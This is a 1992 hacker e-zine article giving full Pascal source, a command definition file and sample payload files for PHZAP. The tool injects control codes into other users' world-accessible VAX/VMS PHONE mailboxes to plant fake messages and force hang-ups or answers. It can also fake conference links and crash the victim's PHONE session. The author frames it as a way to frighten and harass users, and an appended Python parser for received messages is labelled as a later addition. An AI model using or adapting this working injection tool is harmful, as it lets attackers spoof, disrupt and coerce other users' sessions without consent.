Text File | 1992-09-26 | 15KB | 360 lines
Baliord's Stupid VMS Tricks Vol 1: PHONE
----------------------------------------
By Baliord
Phile #6 of P/HUN Magazine Issue #5
This program is the culmination of about a month's research, debugging,
and coding. Any bugs in it are my fault, but I am not liable for them since
I am not running it (or compiling it) on your system. You accept all
responsibility for the execution of this program by compiling it. This
program is meant to show what CAN be done with the VAX/VMS PHONE program,
and is a working program solely for the purpose of showing that it CAN be
done.
Sometime in 1986 or 1987, a friend of mine quit a job working with a
record company. In the process of leaving, he managed to pick up a copy
of the VAX/VMS 4.0 source code on microfiche. Since then, he has gotten
2 more editions. He unfortunately doesn't understand the code, but just
likes to have it around as proof of his "abilities." Once he acquired a
second copy of the code, I requested his earlier edition. He gave it to
me freely.
In the middle of 1988, a "user" at my local college approached me and
said that his PHONE conversations were being tapped. I laughed, and told
them that it was impossible. They persisted, and thus I foraged into the
realm of VMS PHONE discovery. Upon reading the source code for PHONE, I
discovered that it was the funniest, and most interestingly written (and
commented) program in the deck. I discovered that, 1) PHONE was designed
with a RECORD feature that would allow users to record conversations (and
inform the other party that a recording was occurring), and that 2) the
mailboxes created by the phone program were completely world accessible,
as well as being easily discovered; and that 3) for some reason DEC had
commented out ONE LINE from PHONE, making it unable to RECORD, but still
including the code to do so in the program.
The other thing that was in the PHONE source was a list of the control
codes that would force the program to do various things. Surprisingly, the
commands typed at the keyboard were treated the same as characters received
through the mailboxes. Needless to say, I immediately started considering
ways to access them. After a bit of debugging, hacking, and causing some
horrible errors to appear on other people's terminals, the program here was
written.
The first program is the actual PASCAL source code for the message
sender; the next program is the .CLD file you should create to use the
program; the next thing is a list of the format and the method used in
creating your own file to send. The last file is a few sample files to
be created to demonstrate the things that can be done.
An interesting point is that the CALLING user creates the mailbox
FOR the called user. This means that an answering machine program can
be written that will receive messages, and hang up without needing the
user to watch over it. Of course the user must be logged in, but they
need not receive phone calls to get their messages! I have written a
program to do this, and it may be published in the future.
Oh yes, the method for finding out what users are currently using
the phone system is to:
SHOW LOG PHN$*/SYS
This works because PHONE creates systemwide logical names formatted as
PHN$<username>.
The following is the method for using the PHZAP program... Lines that
begin with ';' are comments...
$ SET COMMAND PHZAP
; This enables the command...
$ SHOW LOG PHN$*
"PHN$GOD" = "_MBAxxx"
"PHN$DEVIL" = "_MBAxxx"
; As I just said, that lists out who's using the system...
$ ZAP GOD/TYPE=MSG/MESSAGE="Personally? I think you goofed off for six days"
$ ZAP GOD/TYPE=MSG/MESSAGE=" then pulled an all-nighter!~"
; Drops up the message on His screen.
$ ZAP DEVIL/TYPE=MSG/MESSAGE="\And I said, Let There Be Light! And YOU got"
$ ZAP DEVIL/TYPE=MSG/MESSAGE="hung up!"
$ ZAP DEVIL/TYPE=CMD/MESSAGE="HANGUP"
; Places the message on Its screen, then forces It to HANGUP.
$ ZAP GOD/TYPE=CMD/MESSAGE="HELP SWITCH_HOOK"
; This command teaches Him a bit about Switch Hooks, by forcing Him into
; help...
--------------------------------------------------------------------------
If you get the feeling that I'm a bit anti-religious, and that those
capital letters are smotheringly sarcastic... You're smarter than you
look!
---------------------------------------------------------------------------
PHZAP.PAS follows:
[ INHERIT( 'SYS$LIBRARY:STARLET' ) ]
{*************************************************************************}
{* If you are going to use this program, please leave this message       *}
{* in the file. When referring to this program, give credit where        *}
{* credit is due.                                                        *}
{*                                                          -- Baliord   *}
{*************************************************************************}
program Phone_Phool(output,phzap);

const
   max = 132;

type
   string_type = VARYING[ MAX ] OF CHAR;
   word_type = [ word ]0..65535;

var
   MAILBOX_NAME : STRING_TYPE;
   mailbox_channel : word_type;
   MsgStr,Send_File, command, mailbox_device_name : string_type;
   length : integer;
   phZAP: text;

[external,asynchronous] procedure cli$get_value (
   entity: packed array [$L7..$U7:integer] of char := %immed 0;
   var retdesc : Varying [$R0] of char) ; external;

[ asynchronous ]
function lib$sys_trnlog( %descr logical_name : varying[ l1 ] of char;
                         %ref name_length : integer := %immed 0;
                         %descr equivalence : varying[ l2 ] of char;
                         %ref table : integer := %immed 0 ) : integer;
   external;

[external,asynchronous] function cli$present(
   entity: packed array [$L7..$U7:integer] of char := %immed 0):Integer;
   external;

{
  The following procedure checks to find out who you want hit with a message,
  and opens their phone mailbox and sends the command to it.
}
Procedure Send(Command:String_Type);
Begin
   Cli$get_value('USER',Mailbox_Name);
   Mailbox_Name:='PHN$'+Mailbox_Name;
   if lib$sys_trnlog(mailbox_name,length,mailbox_device_name)>ss$_normal then
      writeln( 'Mailbox ', mailbox_name, ' does not exist.' )
   else
   begin
      mailbox_device_name.length := length;
      $assign( mailbox_device_name, mailbox_channel ); { Assign channel }
      $qio( , mailbox_channel, io$_writevblk + io$m_noformat + io$m_now,
            ,,, command.body, command.length, ); { Send command. }
   end;
End;

{
  This procedure adds the "smb_cmd" (symbiont Command) function to the
  beginning of a message. This forces the message you send to be interpreted
  by PHONE as a command typed by the user.
}
Procedure Snd_Cmd(Y:String_Type);
Var X:Integer;
Begin
   Y:=Y+chr(13);
   Y:=chr(3)+Y+chr(0);
   Send(Y);
End;

{
  Here we convert the string from the plaintext given by the ZAPper to the
  string that will be sent to the poor desperate user. It converts the
  '~' character into a carriage return, the '\' into a ^L (which clears the
  screen) and the "|" into a ^W which repaints the screen.
}
Procedure Snd_Msg(Y:String_Type);
Var X:Integer;
Begin
   X:=1;
   While X<>0 do
   Begin
      X:=Index(Y,'~');
      If X<>0 then Y[X]:=chr(13);
   End;
   X:=Index(Y,'\');
   If X<>0 then Y[X]:=chr(12);
   X:=Index(Y,'|');
   If X<>0 then Y[X]:=chr(23);
   Y:=chr(2)+Y+chr(0);
   Send(Y);
End;

Begin (** MAIN PROGRAM **)
   { 229872 = %X381F0, the CLI$_ABSENT status value. }
   if cli$present('MESSAGE')<>229872 then cli$get_value('MESSAGE',msgstr);
   { If the person is sending a message then it will be in the MSG area. }
   if cli$present('TYPE')<>229872 then cli$get_value('TYPE',Send_File) else
      Send_File:='ACCVIO.PHN';
   { If the /TYPE= is not specified then it tries to force the user's PHONE
     program to crash with an ACCESS VIOLATION... (a nice, frightening
     trick to play on a poor user.) It is normally possible to send a file
     through this command, BUT you must know the format...
   }
   IF SEND_FILE='CMD' then SND_CMD(MSGSTR) ELSE
   If Send_File='MSG' then SND_MSG(MsgStr) Else
   BEGIN
      if Index(Send_File,'.')=0 then Send_File:=Send_File+'.PHN';
      Cli$get_value('USER',Mailbox_Name);
      Mailbox_Name:='PHN$'+Mailbox_Name;
      if lib$sys_trnlog(mailbox_name,length,mailbox_device_name)>
         ss$_normal then
         writeln( 'Mailbox ', mailbox_name, ' does not exist.' )
      else
      begin
         OPEN(FILE_VARIABLE:=PHZAP
             ,FILE_NAME:=SEND_FILE
             ,HISTORY:=OLD
             ,DEFAULT:='[]'); { Replace this with the default dir }
                              { you will be most often using...}
         mailbox_device_name.length := length;
         $assign( mailbox_device_name, mailbox_channel );
                              { Assign channel }
         reset(phZAP);
         repeat
            readln(phZAP,command);
            $qio( , mailbox_channel, io$_writevblk + io$m_noformat
                  + io$m_now,
                  ,,, command.body, command.length, ); { Send command. }
         until eof(phZAP)
      end;
   END;
end.
------------------------------------------------------------------------------
PHZAP.CLD follows:
MODULE PHZAP_COMMAND
Define Verb Zap
Image "[{directory}]PHZAP.EXE"
; ^^ Convert this to the directory the program will be in
; and then delete these three lines.
;
Qualifier Type,Value
Parameter P1,Label=User,Value(Required),Prompt="Username"
Qualifier Message,Value
-----------------------------------------------------------------------------
The format for a simple file is <cmd-char>NODE::USERNAME<CHR(0)><msg-char>
You can force a message to a person's screen by one of two methods,
the first is using the above format and writing your message in the <msg-char>
section of the packet using <listen>. This requires writing it character by
character. The other option is to send the KBD_ROUTE command along with the
message in normal text (with a <CHR(0)> at the end of course.)
The CMD_PARSE command allows you to force a command on the user, through
their PHONE program. It only works for commands within PHONE, however, so
you cannot make them log out or such, only kick them out of phone.
The ANSWERED flag is useful in writing an answering machine, in that you
send <answered>NODE::<answering user><CHR(0)> and the calling PHONE program
will pop up the second screen as if the person had answered. BUSY is also
a nice one to be able to send (as well as rejected!)
If you send a <hangup>NODE::<hanging user><CHR(0)> ONLY THE USER YOU HIT
with PHZAP will see that user as hung-up! The other user (who supposedly
hung up) will still see the other user listed on their screen! (Nothing
typed will reach them of course, but it is an interesting mindfuck!)
The <facsimile><msg-text><CHR(0)> is (if I remember correctly) the proper
method for FAXing something over the VAX PHONE.
The <held>NODE::<holding user><CHR(0)> command puts the user you hit on
HOLD in that user's eyes, but not to the "holding user."
Sending a <forced-link>NODE::<user #1><CHR(0)>NODE::<user #2><CHR(0)> will
pretend to create a link between the user you are ZAPping and user #2. Both
users **MUST** be logged in, but not necessarily in PHONE! Thus you can force
a link between a user and <login> just to freak them out! An example of this
is given below.
The codes I haven't discussed are either too weird/complex to handle
easily, or I just don't know how to use them. (or have never bothered.)
kbd_get = chr (1);
kbd_route = chr (2);
cmd_parse = chr (3);
talk = chr (4);
help2 = chr (5);
ring_out = chr (6);
slave_verify = chr (7);
rang_in = chr (8);
hangup = chr (9);
busy = chr (10);
answered = chr (11);
rejected = chr (12);
slave_done = chr (13);
listen = chr (14);
directory2 = chr (15);
facsimile2 = chr (16);
forced_link = chr (17);
held = chr (18);
unheld = chr (19);
----------------------------------------------------------------------------
Some sample .PHN files follow... <nn> is used to refer to <CHR(nn)>...
FOFF.PHN
<04>Lemme ALONE dammit!!<00>
This drops a message in the user's OWN message area as if he had typed it
to send to somebody. They don't even have to be connected to somebody for
you to do this. It's most useful when someone is calling you and you want
to tell them to call back later.
FYOU.PHN
<14>HEAVEN::GOD<00>F
<14>HEAVEN::GOD<00>u
<14>HEAVEN::GOD<00>c
<14>HEAVEN::GOD<00>k
<14>HEAVEN::GOD<00>
<14>HEAVEN::GOD<00>Y
<14>HEAVEN::GOD<00>o
<14>HEAVEN::GOD<00>u
<14>HEAVEN::GOD<00>!
This sends a message to a user in the standard way, as if someone had
typed it. This is also the method that is in the mailboxes used by PHONE,
so if you want to write an answering machine, you have to parse that pattern.
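
Added example, not part of the original phile: a Python parser for the receiving (answering machine) side, which splits records shaped like the FYOU.PHN lines above and reassembles the text per sender. It assumes <nn> is decimal and one record per line; the function names and the sample records are constructed for illustration.

```python
import re

# Control codes as listed in the article's table (values taken as decimal).
CODES = dict(enumerate(
    "kbd_get kbd_route cmd_parse talk help2 ring_out slave_verify rang_in "
    "hangup busy answered rejected slave_done listen directory2 facsimile2 "
    "forced_link held unheld".split(), start=1))
# Codes whose body is plain text with no NODE::USER header in the article's samples.
HEADERLESS = {"kbd_route", "cmd_parse", "talk"}

def phn_to_bytes(line):
    """Expand the article's <nn> notation to raw bytes (assumes nn is decimal)."""
    return re.sub(r"<(\d+)>", lambda m: chr(int(m.group(1))), line).encode("latin-1")

def parse_record(rec):
    """Return (code_name, sender_or_None, payload_text) for one mailbox record."""
    if not rec:
        raise ValueError("empty record")
    name = CODES.get(rec[0], "unknown(%d)" % rec[0])
    body = rec[1:]
    if name in HEADERLESS:
        return name, None, body.rstrip(b"\x00").decode("latin-1")
    sender, nul, payload = body.partition(b"\x00")
    if not nul or b"::" not in sender:
        raise ValueError("%s record lacks NODE::USER<00> header" % name)
    return name, sender.decode("latin-1"), payload.decode("latin-1")

def collect(records):
    """Reassemble per-sender text from listen records; set everything else aside."""
    text, other = {}, []
    for rec in records:
        try:
            name, sender, payload = parse_record(rec)
        except ValueError as err:
            other.append(("malformed", str(err)))
            continue
        if name == "listen":
            text[sender] = text.get(sender, "") + payload
        else:
            other.append((name, sender or payload))
    return text, other

# Constructed sample records in the article's .PHN notation (not captured traffic).
SAMPLE = ["<14>NODEA::ALICE<00>H", "<14>NODEA::ALICE<00>i",
          "<14>NODEB::BOB<00>!", "<09>NODEA::ALICE<00>",
          "<03>HELP<13><00>", "<14>no header here"]

if __name__ == "__main__":
    messages, other = collect(phn_to_bytes(s) for s in SAMPLE)
    print(messages)   # per-sender reassembled text
    print(other)      # non-listen and malformed records, kept separate
```

Records that are not listen text, including the keyboard-style codes and anything malformed, land in the second list so they are never mistaken for something a caller typed.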
ACCVIO.PHN
<15>HEAVEN::GOD<00>
That causes Access Violation errors to flow down the user's screen. Don't
ask me why; I don't know. Does it under V4.6 of VMS, others I'm not sure.
LINKUP.PHN
<16>HEAVEN::DEVIL<00>HEAVEN::GOD<00>
After sending that to a user's mailbox, their screen should flash with the
"DEVIL has created a conference call with GOD" message. Both users MUST exist
and be logged on currently. If you want to add yourself into a conversation
go into phone, have someone "link" you with their conversation and then have
someone link them with you... It must be done to both. Of course you could
always use this...
ANSWER.PHN
<03>ANSWER<0>
That will force an ANSWER command from the keyboard into the COMMAND
buffer. If you have a friend do that to them, as you are phoning them, then
they will be connected without the chance of them rejecting! <Then you have
your friend start linking all the phone conversations on the system by one
person each!>
I think that's enough examples for you to be able to figure out the
format for the rest yourself.
If you have questions about this, or any other program you have seen
my name on, or you have VAX specific questions, I am available on The Toll
Center BBS @ (718) 358-9209 and the Rogue's Gallery BBS @ (516) 361-9846.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Downloaded From P-80 International Information Systems 304-744-2253 12yrs+